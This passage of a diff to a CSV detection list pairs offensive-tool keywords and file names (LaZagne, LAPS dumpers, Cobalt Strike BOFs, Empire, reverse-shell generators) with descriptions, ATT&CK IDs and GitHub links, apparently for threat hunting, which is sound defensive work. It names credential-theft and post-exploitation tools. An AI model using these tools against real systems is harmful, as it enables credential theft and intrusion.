T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*lan_fingerprint_common.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_ping_sweep.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_sw_port_scan.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*lanjelot*","offensive_tool_keyword","Github Username","github username. creator of patator and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/lanjelot","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LANs.py*","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","10","2533","518","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z" -"*laps_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*LapsAllowedAdminGroups.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*lanscan_arp.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*laps_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*LapsAllowedAdminGroups.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*LAPSDecrypt.*","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Lapsdump.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*Lapsdump.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*LAPSDumper-main*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" -"*LapsPasswords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LapsPasswords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*LAPSToolkit*","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","N/A","Information Gathering","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","7","659","108","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z" "*LaresLLC/SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*LasCC/Hack-Tools*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*lastpass.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*lastpass/process_lp_files.py*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*lastpass_sniffed_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*lastpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*LasCC/Hack-Tools*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*lastpass.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass/process_lp_files.py*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass_sniffed_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lastpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Lateral/DCom.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/PSExec.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClient.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" @@ -13011,45 +13168,45 @@ "*Launch Empire CLI*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*Launch Empire Server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*LaunchExploitMode.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*LaunchPreCompromise.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*layer8secure/SilentHound*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"*Lazagne*Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*laZagne.exe browsers*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*Lazagne.exe*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne*Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*laZagne.exe browsers*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne.exe*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*laZagne.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*Lazagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*LaZagneForensic*","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","5","450","114","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z" -"*LaZagne-master.zip*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*LaZagne-master.zip*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*lazynmap.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*lazypariah *","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*lazypariah.svg*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*ldap_enums.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*ldap_shell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ldapasn1.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation 